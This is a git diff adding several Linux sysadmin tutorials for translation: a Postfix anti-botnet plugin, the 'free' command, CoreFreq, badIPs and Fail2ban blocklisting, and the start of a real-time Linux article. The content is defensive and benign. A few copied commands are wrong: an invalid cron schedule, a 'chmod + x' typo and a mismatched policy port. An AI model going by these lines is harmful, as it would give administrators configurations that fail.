| 6 | + | 74.94.231.___ | US | 6 | + | 96.64.21.___ | US | 6 | + | 71.187.41.___ | US | 60 | + | 184.177.173.___ | US | 61 | + | 75.71.114.___ | US | 61 | + | 75.82.232.___ | US | 61 | + | 97.77.161.___ | US | 63 | + | 50.154.213.___ | US | 65 | + | 96.85.169.___ | US | 67 | + | 100.33.70.___ | US | 68 | + | 98.100.71.___ | US | 68 | + | 24.176.214.___ | US | 69 | + | 74.113.89.___ | US | 69 | + | 204.116.101.___ | US | 7 | + | 216.216.68.___ | US | 7 | + | 65.188.191.___ | US | 7 | + | 69.15.165.___ | US | 7 | + | 74.219.118.___ | US | 7 | + | 173.10.219.___ | US | 71 | + | 97.77.209.___ | US | 72 | + | 173.163.236.___ | US | 73 | + | 162.210.13.___ | US | 79 | + | 12.236.19.___ | US | 8 | + | 208.180.242.___ | US | 8 | + | 24.221.97.___ | US | 8 | + | 40.132.97.___ | US | 8 | + | 50.79.227.___ | US | 8 | + | 64.130.109.___ | US | 8 | + | 66.80.57.___ | US | 8 | + | 74.68.130.___ | US | 8 | + | 74.70.242.___ | US | 8 | + | 96.80.61.___ | US | 81 | + | 74.43.153.___ | US | 83 | + | 208.123.153.___ | US | 85 | + | 75.149.238.___ | US | 87 | + | 96.85.138.___ | US | 89 | + | 208.117.200.___ | US | 9 | + | 208.68.71.___ | US | 9 | + | 50.253.180.___ | US | 9 | + | 50.84.132.___ | US | 9 | + | 63.139.29.___ | US | 9 | + | 70.43.78.___ | US | 9 | + | 74.94.154.___ | US | 9 | + | 50.76.82.___ | US | 94 | + +-----------------+------------+-------------+ +``` + +**In next table we can see the distribution of IP addresses by country:** + +``` + +--------+ + | 214 US | + | 28 GB | + | 17 IT | + | 15 ES | + | 15 CA | + | 8 DE | + | 4 IE | + | 3 KW | + | 3 IN | + | 3 CZ | + | 2 NL | + | 1 UA | + | 1 TH | + | 1 SK | + | 1 SG | + | 1 SA | + | 1 PT | + | 1 PR | + | 1 PL | + | 1 PH | + | 1 PA | + | 1 NO | + | 1 MX | + | 1 MA | + | 1 LC | + | 1 KR | + | 1 JO | + | 1 IL | + | 1 HU | + | 1 GH | + | 1 FR | + | 1 EC | + | 1 DK | + | 1 CR | + | 1 CO | + | 1 CN | + | 1 CH | + | 1 BE | + | 1 AU | + | 1 AR | + | 1 AO | + +--------+ +``` + +Based on these tables can be drawn multiple facts according to which we designed our plugin: + +* Spam was spread from a botnet. This is indicated by logins from huge amount of client IP addresses. +* Spam was spread with a low cadence of messages in order to avoid rate limits. +* Spam was spread from IP addresses from multiple countries (more than 30 countries after few minutes) which indicates an international botnet. + +From these tables were taken out the statistics of IP addresses used, number of logins and countries from which were users logged in: + +* Total number of logins 7531.  +* Total number of IP addresses used 342.  +* Total number of unique countries 41.  + +### Defending against botnet spammers + +The solution to this kind of spam behavior was to make a plugin for the postfix firewall - postfwd. Postfwd is program that can be used to block users by rate limits, by using mail blacklists and by other means. + +We designed and implemented the plugin that counts the number of unique countries from which a user logged in to his account by sasl authentication. Then in the postfwd configuration, you can set limits to the number of countries and after getting above the limit, user gets selected smtp code reply and is blocked from sending emails. + +I am using this plugin in a medium sized internet provider company for 6 months and currently the plugin automatically caught over 50 compromised users without any intervention from administrator's side. Another interesting fact after 6 months of usage is that after finding spammer and sending SMTP code 544 (Host not found - not in DNS) to compromised account (sended directly from postfwd), botnets stopped trying to log into compromised accounts. It looks like the botnet spam application is intelligent and do not want to waste botnet resources. Sending other SMTP codes did not stopped botnet from trying. + +The plugin is available at my company's github - [https://github.com/Vnet-as/postfwd-anti-geoip-spam-plugin][5] + +### Installation + +In this part I will give you a basic tutorial of how to make postfix work with postfwd and how to install the plugin and add a postfwd rule to use it. Installation was tested and done on Debian 8 Jessie. Instructions for parts of this installation are also available on the github project page. + +1\. First install and configure postfix with sasl authentication. There are a lot of great tutorials on installation and configuration of postfix, therefore I will continue right next with postfwd installation.  + +2\. The next thing after you have postfix with sasl authentication installed is to install postfwd. On Debian systems, you can do it with the apt package manager by executing following command (This will also automatically create a user **postfw** and file **/etc/default/postfwd** which we need to update with correct configuration for autostart). + +apt-get install postfwd + +3\. Now we proceed with downloading the git project with our postfwd plugin: + +apt-get install git +git clone https://github.com/Vnet-as/postfwd-anti-geoip-spam-plugin /etc/postfix/postfwd-anti-geoip-spam-plugin +chown -R postfw:postfix /etc/postfix/postfwd-anti-geoip-spam-plugin/ + +4\. If you do not have git or do not want to use git, you can download raw plugin file: + +mkdir /etc/postfix/postfwd-anti-geoip-spam-plugin +wget https://raw.githubusercontent.com/Vnet-as/postfwd-anti-geoip-spam-plugin/master/postfwd-anti-spam.plugin -O /etc/postfix/postfwd-anti-geoip-spam-plugin/postfwd-anti-spam.plugin +chown -R postfw:postfix /etc/postfix/postfwd-anti-geoip-spam-plugin/ + +5. Then update the postfwd default config in the **/etc/default/postfwd** file and add the plugin parameter '**--plugins /etc/postfix/postfwd-anti-geoip-spam-plugin/postfwd-anti-spam.plugin'** to it**:** + +sed -i 's/STARTUP=0/STARTUP=1/' /etc/default/postfwd # Auto-Startup + +sed -i 's/ARGS="--summary=600 --cache=600 --cache-rdomain-only --cache-no-size"/#ARGS="--summary=600 --cache=600 --cache-rdomain-only --cache-no-size"/' /etc/default/postfwd # Comment out old startup parameters + +echo 'ARGS="--summary=600 --cache=600 --cache-rdomain-only --cache-no-size --plugins /etc/postfix/postfwd-anti-geoip-spam-plugin/postfwd-anti-spam.plugin"' >> /etc/default/postfwd # Add new startup parameters + +6\. Now create a basic postfwd configuration file with the anti spam botnet rule: + +cat <<_EOF_ >> /etc/postfix/postfwd.cf +# Anti spam botnet rule +# This example shows how to limit e-mail address defined by sasl_username to be able to login from max. 5 different countries, otherwise they will be blocked to send messages. +id=COUNTRY_LOGIN_COUNT ; \ +sasl_username=~^(.+)$ ; \ +incr_client_country_login_count != 0 ; \ +action=dunno +id=BAN_BOTNET ; \ +sasl_username=~^(.+)$ ; \ +client_uniq_country_login_count > 5 ; \ +action=rate(sasl_username/1/3600/554 Your mail account was compromised. Please change your password immediately after next login.) +_EOF_ + +7\. Update the postfix configuration file **/etc/postfix/main.cf** to use the policy service on the default postfwd port **10040** (or different port according to the configuration in **/etc/default/postfwd**). Your configuration should have following option in the **smtpd_recipient_restrictions** line. Note that the following restriction does not work without other restrictions such as one of **reject_unknown_recipient_domain** or **reject_unauth_destination**. + +echo 'smtpd_recipient_restrictions = check_policy_service inet:127.0.0.1:12525' >> /etc/postfix/main.cf + +8\. Install the dependencies of the plugin:  + +`apt-get install -y libgeo-ip-perl libtime-piece-perl libdbd-mysql-perl libdbd-pg-perl` + +9\. Install MySQL or PostgreSQL database and configure one user which will be used in plugin. + +10\. Update database connection part in plugin to refer to your database backend configuration. This example shows the MySQL configuration for a user testuser and database test. + +``` +# my $driver = "Pg"; +my $driver = "mysql"; +my $database = "test"; +my $host = "127.0.0.1"; +my $port = "3306"; +# my $port = "5432"; +my $dsn = "DBI:$driver:database=$database;host=$host;port=$port"; +my $userid = "testuser"; +my $password = "password"; +``` + +11\. Now restart postfix and postfwd service. + +``` +service postfix restart && service postfwd restart +``` + +-------------------------------------------------------------------------------- + +via: https://www.howtoforge.com/tutorial/blocking-of-international-spam-botnets-postfix-plugin/ + +作者:[Ondrej Vasko][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.howtoforge.com/tutorial/blocking-of-international-spam-botnets-postfix-plugin/ +[1]:https://www.howtoforge.com/tutorial/blocking-of-international-spam-botnets-postfix-plugin/#introduction +[2]:https://www.howtoforge.com/tutorial/blocking-of-international-spam-botnets-postfix-plugin/#how-international-botnet-works +[3]:https://www.howtoforge.com/tutorial/blocking-of-international-spam-botnets-postfix-plugin/#defending-against-botnet-spammers +[4]:https://www.howtoforge.com/tutorial/blocking-of-international-spam-botnets-postfix-plugin/#installation +[5]:https://github.com/Vnet-as/postfwd-anti-geoip-spam-plugin diff --git a/sources/tech/20170208 free – A Standard Command to Check Memory Usage Statistics in Linux.md b/sources/tech/20170208 free – A Standard Command to Check Memory Usage Statistics in Linux.md new file mode 100644 index 0000000000..1df4c79752 --- /dev/null +++ b/sources/tech/20170208 free – A Standard Command to Check Memory Usage Statistics in Linux.md @@ -0,0 +1,218 @@ +free – A Standard Command to Check Memory Usage Statistics (Free & Used) in Linux +============================================================ + +We all knows, most of the Servers (Including world Top Super Computers are running in Linux) are running in Linux platform on IT infrastructure because Linux is more flexible compare with other operating systems. Other operating systems required reboot for small small changes & patch updates but Linux systems doesn’t required reboot except critical patch updates. + +One of the big challenge for Linux administrator to maintain the system up and running without any downtime. To managing memory utilization on Linux is another challenging task for administrator, `free` is one of the standard & widely used command, to analyze Memory Statistics (Free & Used Memory) in Linux. Today we are going to cover free command with useful options. + +Suggested Articles : + +* [smem – Linux Memory Reporting/Statistics Tool][1] +* [vmstat – A Standard Nifty Tool to Report Virtual Memory Statistics][2] + +#### What’s Free Command + +free displays the total amount of `free` and `used` physical and `swap` memory in the system, as well as the `buffers` and `caches`used by the kernel. The information is gathered by parsing /proc/meminfo. + +#### Display System Memory + +Run the `free` command without any option to display system memory, including total amount of `free`, `used`, `buffers`, `caches`& `swap`. + +``` +# free + total used free shared buffers cached +Mem: 32869744 25434276 7435468 0 412032 23361716 +-/+ buffers/cache: 1660528 31209216 +Swap: 4095992 0 4095992 +``` + +The output has three columns. + +* Column-1 : Indicates Total memory, used memory, free memory, shared memory (mostly used by tmpfs (Shmem in /proc/meminfo)), memory used for buffers, cached contents memory size. + +* Total : Total installed memory (MemTotal in /proc/meminfo) +* Used : Used memory (calculated as total – free + buffers + cache) +* Free : Unused memory (MemFree in /proc/meminfo) +* Shared : Memory used (mostly) by tmpfs (Shmem in /proc/meminfo) +* Buffers : Memory used by kernel buffers (Buffers in /proc/meminfo) +* Cached : Memory used by the page cache and slabs (Cached and SReclaimable in /proc/meminfo) + +* Column-2 : Indicates buffers/cache used & free. +* Column-3 : Indicates Total swap memory (SwapTotal in /proc/meminfo), free (SwapFree in /proc/meminfo)) & used swap memory. + +#### Display Memory in MB + +By default `free` command output display memory in `KB - Kilobytes` which is bit confusion to most of the administrator (Many of us convert the output to MB, to understand the size, when the system has more memory). To avoid the confusion, add `-m` option with free command to get instant output with `MB - Megabytes`. + +``` +# free -m + total used free shared buffers cached +Mem: 32099 24838 7261 0 402 22814 +-/+ buffers/cache: 1621 30477 +Swap: 3999 0 3999 +``` + +How to check, how much free ram I really have From the above output based on `used` & `free` column, you may think, you have very low free memory, when it’s really just `10%`, How ? + +Total Actual Available RAM = (Total RAM – column2 used) +Total RAM = 32099 +Actual used RAM = -1621 + +Total actual available RAM = 30477 + +If you have latest distribution, you have a option to see the actual free memory called `available`, for older distribution, look at the `free` column in the row that says `-/+ buffers/cache`. + +How to check, how much RAM actually used From the above output based on `used` & `free` column, you may think, you have utilized morethan `95%` memory. + +Total Actual used RAM = column1 used – (column1 buffers + column1 cached) +Used RAM = 24838 +Used Buffers = 402 +Used Cache = 22814 + +Total Actual used RAM = 1621 + +#### Display Memory in GB + +By default `free` command output display memory in `KB - Kilobytes` which is bit confusion to most of the administrator, so we can use the above option to get the output in `MB - Megabytes` but when the server has huge memory (morethan 100 GB or 200 GB), the above option also get confuse, so in this situation, we can add `-g` option with free command to get instant output with `GB - Gigabytes`. + +``` +# free -g + total used free shared buffers cached +Mem: 31 24 7 0 0 22 +-/+ buffers/cache: 1 29 +Swap: 3 0 3 +``` + +#### Display Total Memory Line + +By default `free` command output comes with three columns (Memory, Buffers/Cache & Swap). To display consolidated total in separate line (Total (Mem+Swap), Used (Mem+(Used – Buffers/Cache)+Swap) & Free (Mem+(Used – Buffers/Cache)+Swap), add `-t` option with free command. + +``` +# free -t + total used free shared buffers cached +Mem: 32869744 25434276 7435468 0 412032 23361716 +-/+ buffers/cache: 1660528 31209216 +Swap: 4095992 0 4095992 +Total: 36965736 27094804 42740676 +``` + +#### Run free with delay for better statistic + +By default free command display single statistics output which is not enough to troubleshoot further so, add delay (delay is the delay between updates in seconds) which capture the activity periodically. If you want to run free with 2 second delay, just use the below command (If you want more delay you can change as per your wish). + +The following command will run every 2 seconds until you exit. + +``` +# free -s 2 + total used free shared buffers cached +Mem: 32849392 25935844 6913548 188 182424 24632796 +-/+ buffers/cache: 1120624 31728768 +Swap: 20970492 0 20970492 + + total used free shared buffers cached +Mem: 32849392 25935288 6914104 188 182424 24632796 +-/+ buffers/cache: 1120068 31729324 +Swap: 20970492 0 20970492 + + total used free shared buffers cached +Mem: 32849392 25934968 6914424 188 182424 24632796 +-/+ buffers/cache: 1119748 31729644 +Swap: 20970492 0 20970492 +``` + +#### Run free with delay & counts + +Alternatively you can run free command with delay and specific counts, once it reach the given counts then exit automatically. + +The following command will run every 2 seconds with 5 counts then exit automatically. + +``` +# free -s 2 -c 5 + total used free shared buffers cached +Mem: 32849392 25931052 6918340 188 182424 24632796 +-/+ buffers/cache: 1115832 31733560 +Swap: 20970492 0 20970492 + + total used free shared buffers cached +Mem: 32849392 25931192 6918200 188 182424 24632796 +-/+ buffers/cache: 1115972 31733420 +Swap: 20970492 0 20970492 + + total used free shared buffers cached +Mem: 32849392 25931348 6918044 188 182424 24632796 +-/+ buffers/cache: 1116128 31733264 +Swap: 20970492 0 20970492 + + total used free shared buffers cached +Mem: 32849392 25931316 6918076 188 182424 24632796 +-/+ buffers/cache: 1116096 31733296 +Swap: 20970492 0 20970492 + + total used free shared buffers cached +Mem: 32849392 25931308 6918084 188 182424 24632796 +-/+ buffers/cache: 1116088 31733304 +Swap: 20970492 0 20970492 +``` + +#### Human readable format + +To print the human readable output, add `h` option with `free` command, which will print more detailed output compare with other options like m & g. + +``` +# free -h + total used free shared buff/cache available +Mem: 2.0G 1.6G 138M 20M 188M 161M +Swap: 2.0G 1.8G 249M +``` + +#### Split Buffers & Cached memory output + +By default `Buffers/Cached` memory output comes together. To split Buffers & Cached memory output, add `-w` option with free command. (This option is available on version 3.3.12). + +Note : See the above output, `Buffers/Cached` comes together. + +``` +# free -wh + total used free shared buffers cache available +Mem: 2.0G 1.6G 137M 20M 8.1M 183M 163M +Swap: 2.0G 1.8G 249M +``` + +#### Show Low and High Memory Statistics + +By default `free` command output comes without Low and High Memory Statistics. To display Show Low and High Memory Statistics, add `-l` option with free command. + +``` +# free -l + total used free shared buffers cached +Mem: 32849392 25931336 6918056 188 182424 24632808 +Low: 32849392 25931336 6918056 +High: 0 0 0 +-/+ buffers/cache: 1116104 31733288 +Swap: 20970492 0 20970492 +``` + +#### Read more about free + +If you want to know more option which is available for free, simply navigate to man page. + +``` +# free --help +or +# man free +``` + +-------------------------------------------------------------------------------- + +via: http://www.2daygeek.com/free-command-to-check-memory-usage-statistics-in-linux/ + +作者:[MAGESH MARUTHAMUTHU][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.2daygeek.com/author/magesh/ +[1]:http://www.2daygeek.com/smem-linux-memory-usage-statistics-reporting-tool/ +[2]:http://www.2daygeek.com/linux-vmstat-command-examples-tool-report-virtual-memory-statistics/ +[3]:http://www.2daygeek.com/author/magesh/ diff --git a/sources/tech/20170209 CoreFreq – A Powerful CPU Monitoring Tool for Linux Systems.md b/sources/tech/20170209 CoreFreq – A Powerful CPU Monitoring Tool for Linux Systems.md new file mode 100644 index 0000000000..7abbf65e54 --- /dev/null +++ b/sources/tech/20170209 CoreFreq – A Powerful CPU Monitoring Tool for Linux Systems.md @@ -0,0 +1,165 @@ +CoreFreq – A Powerful CPU Monitoring Tool for Linux Systems +============================================================ + +CoreFreq is a [CPU monitoring program][1] intended for the Intel 64-bits processor and supports architectures such as Atom, Core2, Nehalem, SandyBridge and above, AMD Family 0F. + +Its core is established on a kernel module which helps to retrieve internal performance counters from each CPU core, and works in relation with a daemon which gathers the data and a small console client links to the daemon and displays collected data. + +[ + ![CoreFreq CPU Monitoring](http://www.tecmint.com/wp-content/uploads/2017/02/CoreFreq-CPU-Monitoring.gif) +][2] + +It offers a groundwork to recapture CPU data with a high degree of accuracy: + +1. Core frequencies & ratios; SpeedStep (EIST), Turbo Boost, Hyper-Threading (HTT) as well as Base Clock. +2. Performance counters in conjunction with Time Stamp Counter (TSC), Unhalted Core Cycles (UCC), Unhalted Reference Cycles (URC). +3. Number of instructions per cycle or second, IPS, IPC, or CPI. +4. CPU C-States C0 C1 C3 C6 C7 – C1E – Auto/UnDemotion of C1 C3. +5. DTS Temperature along with Tjunction Max, Thermal Monitoring TM1 TM2 state. +6. Topology map including Caches for boostrap together with application CPU. +7. Processor features, brand plus architecture strings. + +Note: This tool is more useful and appropriate for expert Linux users and experienced system administrators, however, novice users can gradually learn how to purposefully use it. + +#### How Does CoreFreq Works + +It functions by invoking a Linux Kernel module which then uses: + +1. asm code to keep the readings of the performance counters as close as possible. +2. per-CPU, effects slab data memory plus high-resolution timer. +3. compliant with suspend / resume and CPU Hot-Plug. +4. a shared memory to protect kernel from the user-space part of the program. +5. atomic synchronization of threads to do away with mutexes and deadlock. + +### How to Install CoreFreq in Linux + +To install CoreFreq, first you need to install the prerequisites (Development Tools) to compile and build the program from source. + +``` +$ sudo yum group install 'Development Tools' [On CentOS/RHEL] +$ sudo dnf group install 'Development Tools' [On Fedora 22+ Versions] +# sudo apt-get install dkms git libpthread-stubs0-dev [On Debian/Ubuntu] +``` + +Next clone the CoreFreq source code from the Github repository, move into the download folder and compile and build the program: + +``` +$ git clone https://github.com/cyring/CoreFreq.git +$ cd CoreFreq +$ make +``` +[ + ![Build CoreFreq Program](http://www.tecmint.com/wp-content/uploads/2017/02/make-corefreq.png) +][3] + +Build CoreFreq Program + +Note: Arch Linux users can install [corefreq-git][4] from the AUR. + +Now run the following commands to load the Linux kernel module from local directory followed by the daemon: + +``` +$ sudo insmod corefreqk.ko +$ sudo ./corefreqd +``` + +Then, start the client, as a user. + +``` +$ ./corefreq-cli +``` +[ + ![CoreFreq Linux CPU Monitoring](http://www.tecmint.com/wp-content/uploads/2017/02/CoreFreq-Linux-CPU-Monitoring.gif) +][5] + +CoreFreq Linux CPU Monitoring + +From the interface above, you can use shortcut keys: + +1. `F2` to display a usage menu as seen at the top section of the screen. +2. `Right` and `Left` arrows to move over the menu tabs. +3. `Up` and `Down` arrows to select a menu item, then click [Enter]. +4. `F4` will close the program. +5. `h` will open a quick reference. + +To view all usage options, type the command below: + +``` +$ ./corefreq-cli -h +``` +CoreFreq Options +``` +CoreFreq. Copyright (C) 2015-2017 CYRIL INGENIERIE +usage: corefreq-cli [-option ] +-t Show Top (default) +-d Show Dashboard +arguments: +-c Monitor Counters +-i Monitor Instructions +-s Print System Information +-M Print Memory Controller +-m Print Topology +-u Print CPUID +-k Print Kernel +-h Print out this message +Exit status: +0 if OK, +1 if problems, +>1 if serious trouble. +Report bugs to labs[at]cyring.fr +``` + +To print info about the kernel, run: + +``` +$ ./corefreq-cli -k +``` + +Print CPU identification details: + +``` +$ ./corefreq-cli -u +``` + +You can as well monitor CPU instructions in real-time: + +``` +$ ./corefreq-cli -i +``` + +Enable tracing of counters as below: + +``` +$ ./corefreq-cli -c +``` + +For more information and usage, visit the CoreFreq Github repository: [https://github.com/cyring/CoreFreq][6] + +In this article, we reviewed a powerful CPU monitoring tool, which may be more useful to Linux experts or experienced system administrators as compared to novice users. + +Share your thoughts about this command tool or any related ideas with us via the feedback form below. + +-------------------------------------------------------------------------------- + +作者简介: + +Aaron Kili is a Linux and F.O.S.S enthusiast, an upcoming Linux SysAdmin, web developer, and currently a content creator for TecMint who loves working with computers and strongly believes in sharing knowledge. + +-------------------------------------------------------------------------------- + +via: http://www.tecmint.com/corefreq-linux-cpu-monitoring-tool/ + +作者:[Aaron Kili][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.tecmint.com/author/aaronkili/ + +[1]:http://www.tecmint.com/bcc-best-linux-performance-monitoring-tools/ +[2]:http://www.tecmint.com/wp-content/uploads/2017/02/CoreFreq-CPU-Monitoring.gif +[3]:http://www.tecmint.com/wp-content/uploads/2017/02/make-corefreq.png +[4]:https://aur.archlinux.org/packages/corefreq-git +[5]:http://www.tecmint.com/wp-content/uploads/2017/02/CoreFreq-Linux-CPU-Monitoring.gif +[6]:https://github.com/cyring/CoreFreq diff --git a/sources/tech/20170209 How to protect your server with badIPs.com and report IPs with Fail2ban on Debian.md b/sources/tech/20170209 How to protect your server with badIPs.com and report IPs with Fail2ban on Debian.md new file mode 100644 index 0000000000..11ebcf135e --- /dev/null +++ b/sources/tech/20170209 How to protect your server with badIPs.com and report IPs with Fail2ban on Debian.md @@ -0,0 +1,226 @@ +How to protect your server with badIPs.com and report IPs with Fail2ban on Debian +============================================================ + +### On this page + +1. [Use the badIPs list][4] + 1. [Define your security level and category][1] +2. [Let's create the script][5] +3. [Report IP addresses to badIPs with Fail2ban][6] + 1. [Fail2ban >= 0.8.12][2] + 2. [Fail2ban < 0.8.12][3] +4. [Statistics of your IP reporting][7] + +This tutorial documents the process of using the badips abuse tracker in conjunction with Fail2ban to protect your server or computer. I've tested it on a Debian 8 Jessie and Debian 7 Wheezy system. + +**What is badIPs?** + +BadIps is a listing of IP that are reported as bad in combinaison with [fail2ban][8]. + +This tutorial contains two parts, the first one will deal with the use of the list and the second will deal with the injection of data. + +### +Use the badIPs list + +### Define your security level and category + +You can get the IP address list by simply using the REST API. + +When you GET this URL : [https://www.badips.com/get/categories][9] +You’ll see all the different categories that are present on the service. + +* Second step, determine witch score is made for you. + Here a quote from badips that should help (personnaly I took score = 3): +* If you'd like to compile a statistic or use the data for some experiment etc. you may start with score 0. +* If you'd like to firewall your private server or website, go with scores from 2\. Maybe combined with your own results, even if they do not have a score above 0 or 1. +* If you're about to protect a webshop or high traffic, money-earning e-commerce server, we recommend to use values from 3 or 4\. Maybe as well combined with your own results (key / sync). +* If you're paranoid, take 5. + +So now that you get your two variables, let's make your link by concatening them and grab your link. + +http://www.badips.com/get/list/{{SERVICE}}/{{LEVEL}} + +Note: Like me, you can take all the services. Change the name of the service to "any" in this case. + +The resulting URL is: + +https://www.badips.com/get/list/any/3 + +### Let's create the script + +Alright, when that’s done, we’ll create a simple script. + +1. Put our list in a tempory file. +2. (only once) create a chain in iptables. +3. Flush all the data linked to our chain (old entries). +4. We’ll link each IP to our new chain. +5. When it’s done, block all INPUT / OUTPUT / FORWARD that’s linked to our chain. +6. Remove our temp file. + +Nowe we'll create the script for that: + +cd /home// +vi myBlacklist.sh + +Enter the following content into that file. + +``` +#!/bin/sh +# based on this version http://www.timokorthals.de/?p=334 +# adapted by Stéphane T. + +_ipt=/sbin/iptables    # Location of iptables (might be correct) +_input=badips.db       # Name of database (will be downloaded with this name) +_pub_if=eth0           # Device which is connected to the internet (ex. $ifconfig for that) +_droplist=droplist     # Name of chain in iptables (Only change this if you have already a chain with this name) +_level=3               # Blog level: not so bad/false report (0) over confirmed bad (3) to quite aggressive (5) (see www.badips.com for that) +_service=any           # Logged service (see www.badips.com for that) + +# Get the bad IPs +wget -qO- http://www.badips.com/get/list/${_service}/$_level > $_input || { echo "$0: Unable to download ip list."; exit 1; } + +### Setup our black list ### +# First flush it +$_ipt --flush $_droplist + +# Create a new chain +# Decomment the next line on the first run +# $_ipt -N $_droplist + +# Filter out comments and blank lines +# store each ip in $ip +for ip in `cat $_input` +do +# Append everything to $_droplist +$_ipt -A $_droplist -i ${_pub_if} -s $ip -j LOG --log-prefix "Drop Bad IP List " +$_ipt -A $_droplist -i ${_pub_if} -s $ip -j DROP +done + +# Finally, insert or append our black list +$_ipt -I INPUT -j $_droplist +$_ipt -I OUTPUT -j $_droplist +$_ipt -I FORWARD -j $_droplist + +# Delete your temp file +rm $_input +exit 0 +``` + +When that’s done, you should create a cronjob that will update our blacklist. + +For this, I used crontab and I run the script every day on 11:30PM (just before my delayed backup). + +crontab -e + +``` +23 30 * * * /home//myBlacklist.sh #Block BAD IPS +``` + +Don’t forget to chmod your script: + +chmod + x myBlacklist.sh + +Now that’s done, your server/computer should be a little bit safer. + +You can also run the script manually like this: + +cd /home// +./myBlacklist.sh + +It should take some time… so don’t break the script. In fact, the value of it lies in the last lines. + +### Report IP addresses to badIPs with Fail2ban + +In the second part of this tutorial, I will show you how to report bd IP addresses bach to the badips.com website by using Fail2ban. + +### Fail2ban >= 0.8.12 + +The reporting is made with Fail2ban. Depending on your Fail2ban version you must use the first or second section of this chapter.If you have fail2ban in version 0.8.12. + +If you have fail2ban version 0.8.12 or later. + +fail2ban-server --version + +In each category that you’ll report, simply add an action. + +``` +[ssh] + enabled = true + action = iptables-multiport + badips[category=ssh] + port = ssh + filter = sshd + logpath = /var/log/auth.log + maxretry= 6 +``` + +As you can see, the category is SSH, take a look here ([https://www.badips.com/get/categories][11]) to find the correct category. + +### Fail2ban < 0.8.12 + +If the version is less recent than 0.8.12, you’ll have a to create an action. This can be downloaded here: [https://www.badips.com/asset/fail2ban/badips.conf][12]. + +wget https://www.badips.com/asset/fail2ban/badips.conf -O /etc/fail2ban/action.d/badips.conf + +With the badips.conf from above, you can either activate per category as above or you can enable it globally: + +cd /etc/fail2ban/ +vi jail.conf + +``` +[DEFAULT] + +... + +banaction = iptables-multiport + badips +``` + +Now restart fail2ban - it should start reporting from now on. + +service fail2ban restart + +### Statistics of your IP reporting + +Last step – not really useful… You can create a key. +This one is usefull if you want to see your data. +Just copy / paste this and a JSON response will appear on your console. + +wget https://www.badips.com/get/key -qO - + +``` +{ + "err":"", + "suc":"new key 5f72253b673eb49fc64dd34439531b5cca05327f has been set.", + "key":"5f72253b673eb49fc64dd34439531b5cca05327f" +} +``` + +Then go on [badips][13] website, enter your “key” and click “statistics”. + +Here we go… all your stats by category. + +-------------------------------------------------------------------------------- + +via: https://www.howtoforge.com/tutorial/protect-your-server-computer-with-badips-and-fail2ban/ + +作者:[Stephane T][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.howtoforge.com/tutorial/protect-your-server-computer-with-badips-and-fail2ban/ +[1]:https://www.howtoforge.com/tutorial/protect-your-server-computer-with-badips-and-fail2ban/#define-your-security-level-and-category +[2]:https://www.howtoforge.com/tutorial/protect-your-server-computer-with-badips-and-fail2ban/#failban-gt- +[3]:https://www.howtoforge.com/tutorial/protect-your-server-computer-with-badips-and-fail2ban/#failban-ltnbsp +[4]:https://www.howtoforge.com/tutorial/protect-your-server-computer-with-badips-and-fail2ban/#use-the-badips-list +[5]:https://www.howtoforge.com/tutorial/protect-your-server-computer-with-badips-and-fail2ban/#lets-create-the-script +[6]:https://www.howtoforge.com/tutorial/protect-your-server-computer-with-badips-and-fail2ban/#report-ip-addresses-to-badips-with-failban +[7]:https://www.howtoforge.com/tutorial/protect-your-server-computer-with-badips-and-fail2ban/#statistics-of-your-ip-reporting +[8]:http://www.fail2ban.org/ +[9]:https://www.badips.com/get/categories +[10]:http://www.timokorthals.de/?p=334 +[11]:https://www.badips.com/get/categories +[12]:https://www.badips.com/asset/fail2ban/badips.conf +[13]:https://www.badips.com/ diff --git a/sources/tech/20170209 Inside Real-Time Linux.md b/sources/tech/20170209 Inside Real-Time Linux.md new file mode 100644 index 0000000000..ddfe0812a5 --- /dev/null +++ b/sources/tech/20170209 Inside Real-Time Linux.md @@ -0,0 +1,77 @@ +Inside Real-Time Linux +============================================================ + + + ![Jan Altenberg](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/jan-altenberg-elc.png?itok=mgQeKpEK "Jan Altenberg") + +Real-time Linux has come a long way in the past decade. Jan Altenberg of Linutronix provides an overview of the topic and offers new RTL performance benchmarks in this video from ELC Europe.[The Linux Foundation][1] + +Real-time Linux (RTL), a form of mainline Linux enabled with PREEMPT_RT, has come a long way in the past decade. Some 80 percent of the deterministic [PREEMPT_RT][3] patch is now available in the mainline kernel itself. Yet, backers of the strongest alternative to the single-kernel RTL on Linux -- the dual-kernel Xenomai -- continue to claim a vast superiority in reduced latency. In an [Embedded Linux Conference Europe][4] presentation in October, Jan Altenberg rebutted these claims while offering an overview of the real-time topic. + +Altenberg, of German embedded development firm [Linutronix][5], does not deny that dual-kernel approaches such as Xenomai and RTAI offer lower latency. However, he reveals new Linutronix benchmarks that purport to show that the differences are not as great as claimed, especially in real-world scenarios. Less controversially, he argues that RTL is much easier to develop for and maintain. + +Before we delve into the eternal Xenomai vs. RTL debate, note that in October 2015, the [Open Source Automation Development Lab][6] (OSADL) [handed control][7] of the RTL project over to The Linux Foundation, which hosts Linux.com. In addition, Linutronix is a key contributor to the RTL project and hosts its x86 maintainer. + +The advance of RTL is one of several reasons Linux has [stolen market share][8] from real-time operating systems (RTOSes) over the past decade. RTOSes appear more frequently on microcontrollers than applications processors, and it's easier to do real-time on single-purpose devices that lack advanced userland OSes such as Linux. + +Altenberg began his presentation by clearing up some common misconceptions about real-time (or realtime) deterministic kernel schemes. “Real-time is not about fast execution or performance,” Altenberg told his ELCE audience. “It’s basically about determinism and timing guarantees. Real-time gives you a guarantee that something will execute within a given time frame. You don’t want to be as fast as possible, but as fast as specified.” + +Developers tend to use real-time when a tardy response to a given execution time leads to a serious error condition, especially when it could lead to people getting hurt. That’s why real-time is still largely 